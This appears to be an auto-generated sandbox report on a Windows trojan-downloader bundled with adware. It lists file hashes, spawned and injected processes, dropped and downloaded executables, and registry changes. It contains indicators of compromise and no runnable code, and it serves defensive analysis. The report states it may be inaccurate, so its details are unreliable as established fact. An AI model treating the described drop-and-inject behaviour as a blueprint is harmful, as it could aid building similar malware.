Trojan-Downloader.Win32.Moure_19c284e552

by malwarelabrobot on June 21st, 2016 in Malware Descriptions.

not-a-virus:AdWare.Win32.Vopak.aoun (Kaspersky), Trojan-Downloader.Win32.Moure.FD, Trojan.NSIS.StartPage.FD, Trojan.Win32.IEDummy.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, Adware


The description has been automatically generated by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.


MD5: 19c284e5520c58d4087fd8a6f94bb3fb
SHA1: c7ab9794633160a80fb137a4c3cbc5de02489366
SHA256: c79dfb4a108481b2e0ad7b8afa7ea77ae8231d76b3f588ee9ab4b0f2913c2346
SSDeep: 3072:AgXdZt9P6D3XJ0M08Focw6nE0Wpq6xD4DfmfHJO9o4sL:Ae34nFF1w6EzsaHJks
Size: 134224 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan-Downloader: a Trojan program that downloads files from the Internet without the user's knowledge and executes them.

Payload

No specific payload has been found.

Process activity

The Trojan-Downloader creates the following process(es):

nss15.tmp:2748
nss15.tmp:2668
HY2F7WRL5V.exe:568
AutoTime_51477.exe:4032
win.exe:484
AutoTime_51477.tmp:4080
nsl1E.tmp:2172
idscservice.exe:1368
nsjB.tmp:1568
%original file name%.exe:1756
nsk1B.tmp:2824
nsk1B.tmp:3456
nsk1B.tmp:3440
nsk1B.tmp:2856
nsb10.tmp:2136
qnsm13.tmp:2596
qnsm13.tmp:2588
testversion.exe:820
osmsg.exe:2332
regsvr32.exe:508
hp.exe:2404
nst25.tmp:3184
mofcomp.exe:2556
nst18.tmp:2976
tiantianwifi.exe:2436

The Trojan-Downloader injects its code into the following process(es):

wizzcaster.exe:664
wizzcaster.exe:1944
idscservice.exe:1920
AutoTime.exe:496
osmsg.exe:2564
nsq6.tmp:1492

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process HY2F7WRL5V.exe:568 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Program Files%\SpaceSoundPro\SpaceSoundPro.dll (37993 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\SpaceSoundPro 1.0\Uninstall.lnk (734 bytes)
%Documents and Settings%\%current user%\Desktop\SpaceSoundPro.lnk (742 bytes)
%Program Files%\SpaceSoundPro\SpaceSoundPro.exe (87303 bytes)
%Program Files%\SpaceSoundPro\silentconfigurator.exe (5215 bytes)
%Program Files%\SpaceSoundPro\silentunconfigurator.exe (3502 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\System.dll (11 bytes)
%Program Files%\SpaceSoundPro\Uninstall.exe (1328 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\NSISpcre.dll (6382 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\AccessControl.dll (13 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\SpaceSoundPro 1.0\SpaceSoundPro.lnk (754 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsi8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\NSISpcre.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\AccessControl.dll (0 bytes)

The process AutoTime_51477.exe:4032 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-911CL.tmp\AutoTime_51477.tmp (6356 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-911CL.tmp\AutoTime_51477.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-911CL.tmp (0 bytes)

The process win.exe:484 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Program Files%\Caster\Uninstaller.exe (8008 bytes)
%Program Files%\Caster\wizzcaster.exe (39028 bytes)

The process AutoTime_51477.tmp:4080 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-KS1NL.tmp\HelpTool.dll (10815 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-KS1NL.tmp\AutoTime.exe (23811 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-KS1NL.tmp\_isetup\_shfoldr.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-KS1NL.tmp\_isetup\_RegDLL.tmp (4 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-KS1NL.tmp\_isetup\_RegDLL.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-KS1NL.tmp\HelpTool.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-KS1NL.tmp\AutoTime.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-KS1NL.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-KS1NL.tmp\_isetup\_shfoldr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-KS1NL.tmp\_isetup (0 bytes)

The process nsl1E.tmp:2172 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\UPUpdata\AutoTime_51477.exe (7972 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ui.dll (70 bytes)

The process idscservice.exe:1920 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\51MTCANOTX\testversion.exe (245098 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\51MTCANOTX\win.exe (13484 bytes)
%Program Files%\SpaceSoundPro\config.conf (49 bytes)

The process nsjB.tmp:1568 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\A7914D56-1466442363-ADB2-5C02-3742FA8A8B37\Uninstall.exe (1184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseE.tmp (37949 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspF.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspF.tmp\KillProcDLL.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\A7914D56-1466442363-ADB2-5C02-3742FA8A8B37\nsb10.tmp (9608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspF.tmp\WmiInspector.dll (3616 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nszD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspF.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspF.tmp\KillProcDLL.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\A7914D56-1466442363-ADB2-5C02-3742FA8A8B37\nsb10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspF.tmp\WmiInspector.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspF.tmp (0 bytes)

The process %original file name%.exe:1756 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsuC.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk1C.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\AutoTime51477[1].exe (56936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\ttwifi[1].exe (74423 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1F.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv1D.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa1A.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y7QN67Q5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk1B.tmp (74423 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk4.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y7QN67Q5\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi23.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb7.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh16.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmA.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y7QN67Q5\gXvDHtyh[1].exe (15904 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss15.tmp (347970 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst18.tmp (15904 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse19.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh21.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu26.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\vos_n[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi17.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2] (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy3.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl1E.tmp (56936 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@hejie123[1].txt (215 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\0Be10MR8[1].exe (11960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj24.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp (36408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw14.tmp (15 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq6.tmp (88848 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\1znQuZItQ[1] (36408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst25.tmp (11960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\inetc.dll (20 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsuC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi22.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk1C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv1D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa1A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y7QN67Q5\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh16.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst18.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh21.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi23.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu26.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl1E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj24.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw14.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq6.tmp (0 bytes)

The process AutoTime.exe:496 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Desktop\AutoTime.lnk (865 bytes)

The process nsk1B.tmp:2824 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-HH7RG.tmp\nsk1B.tmp (6356 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-HH7RG.tmp\nsk1B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-HH7RG.tmp (0 bytes)

The process nsk1B.tmp:3456 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Program Files%\ttwifi\is-BMP2P.tmp (9036 bytes)
%Program Files%\ttwifi\unins000.dat (2636 bytes)
%Documents and Settings%\All Users\Application Data\WindowsMsg\is-JQUO0.tmp (14022 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-DOMJK.tmp\_isetup\_shfoldr.dll (23 bytes)
%Program Files%\ttwifi\is-IJ1PQ.tmp (14022 bytes)
%Program Files%\ttwifi\is-6H35A.tmp (9098 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\ttwifi\ttwifi.lnk (698 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\swapfile.ini (118 bytes)
%Documents and Settings%\All Users\Desktop\ttwifi.lnk (686 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-DOMJK.tmp\IDH.dll (9098 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-DOMJK.tmp\hp.exe (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\ttwifi\UnInstall.exe.lnk (678 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-DOMJK.tmp\_isetup\_RegDLL.tmp (4 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-DOMJK.tmp\_isetup\_RegDLL.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-DOMJK.tmp\hp.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-DOMJK.tmp\_isetup (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-DOMJK.tmp\IDH.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-DOMJK.tmp\_isetup\_shfoldr.dll (0 bytes)

The process nsk1B.tmp:3440 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-HRI4J.tmp\nsk1B.tmp (6356 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-HRI4J.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-HRI4J.tmp\nsk1B.tmp (0 bytes)

The process nsk1B.tmp:2856 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-EG1IT.tmp\_isetup\_shfoldr.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-EG1IT.tmp\IDH.dll (9098 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-EG1IT.tmp\_isetup\_RegDLL.tmp (4 bytes)
%WinDir%\WindowsUpdate.log (4453 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\swapfile.ini (118 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-EG1IT.tmp\_isetup\_shfoldr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-EG1IT.tmp\_isetup\_RegDLL.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-EG1IT.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-EG1IT.tmp\IDH.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-EG1IT.tmp\_isetup (0 bytes)

The process nsb10.tmp:2136 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\A7914D56-1466442363-ADB2-5C02-3742FA8A8B37\qnsm13.tmp (2660 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc12.tmp\WmiInspector.dll (3342 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsc12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\A7914D56-1466442363-ADB2-5C02-3742FA8A8B37\nsm13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc12.tmp\WmiInspector.dll (0 bytes)

The process osmsg.exe:2332 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\swapfile.ini (281 bytes)

The process osmsg.exe:2564 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\icon[1].png (344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\logo[1].png (714 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\zrt_lookup[1].htm (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\jquery-1.8.1[1].js (2983 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y7QN67Q5\f[3].txt (12397 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\ca-pub-4886776363109745[1].js (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\xu8ohzAYf-_Ky0RDznODng60bK57yvyAAijjGbRhr90[1].js (2737 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\x_button_blue2[1].png (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\CASVWSPU.htm (1685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\f[2].txt (6027 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\f[1].txt (2856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\en[1].png (1184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\randseek[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y7QN67Q5\googlelogo_color_112x36dp[1].png (1372 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\CAZMOJ7D (12023 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\zrt_lookup[1].html (3332 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\ca-pub-4886776363109745[1].js (1 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@doubleclick[1].txt (1399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\f[2].txt (14489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\swapfile.ini (444 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@doubleclick[2].txt (723 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\f[2].txt (3394 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\f[1].txt (9391 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\ad_300_250[1].css (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y7QN67Q5\f[2].txt (5866 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\ad_js[1].js (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y7QN67Q5\f[1].txt (13580 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y7QN67Q5\6903042196597547844[1].png (30037 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\f[1].txt (8086 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1940 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y7QN67Q5\common[1].js (1833 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\s[1].htm (143 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\s[1] (145 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Cookies\Current_User@doubleclick[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\f[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y7QN67Q5\f[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\f[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\ca-pub-4886776363109745[1].js (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@doubleclick[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\s[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\f[1].txt (0 bytes)

The process hp.exe:2404 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tmp.mof (3 bytes)

The process nst25.tmp:3184 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsu28.tmp (7879 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsu27.tmp (0 bytes)

The process nsq6.tmp:1492 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Program Files%\SpaceSoundPro\idscservice.exe (12319 bytes)
%Program Files%\SpaceSoundPro\uninstaller.exe (17064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\HY2F7WRL5V.exe (447582 bytes)
%Program Files%\SpaceSoundPro\wizzcaster.exe (45820 bytes)
%Program Files%\SpaceSoundPro\UninstallerCaster.exe (9708 bytes)

The process mofcomp.exe:2556 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%System%\wbem\Logs\mofcomp.log (1826 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmp20.tmp (196 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tmp20.tmp (0 bytes)

Registry activity

The process wizzcaster.exe:664 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "03 9D 1C 71 3A EC D3 8B 2D 95 C1 1E 6B 07 A4 85"

[HKCU\Software\Wizzlabs\Wizzcaster]
"UserName" = "004193207192007144030033089028111014129027067035"
"wizztracki_user_name" = "004193207192007144030033089028111014129027067035"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Wizzlabs\Wizzcaster]
"Install Day" = "1466431553"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Wizzlabs\Wizzcaster]
"wizztracki_api_key" = "117236077146106152003095211195039039240039166134055122027077161063064119122174000100011126175035222105122090001206021058107024144129142209018052"
"api_key" = "203091244096184171062073185162044227126063121253"

[HKCU\Software\Wizzlabs\Wizzcaster\20 06 2016]
"404" = "0"

The process wizzcaster.exe:1944 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 51 10 CD C6 0B 13 52 D3 4D 6A DE 29 E6 2C D7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Wizzlabs\Wizzcaster\20 06 2016]
"404" = "2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process nss15.tmp:2748 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1466354106"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "nss15.tmp"

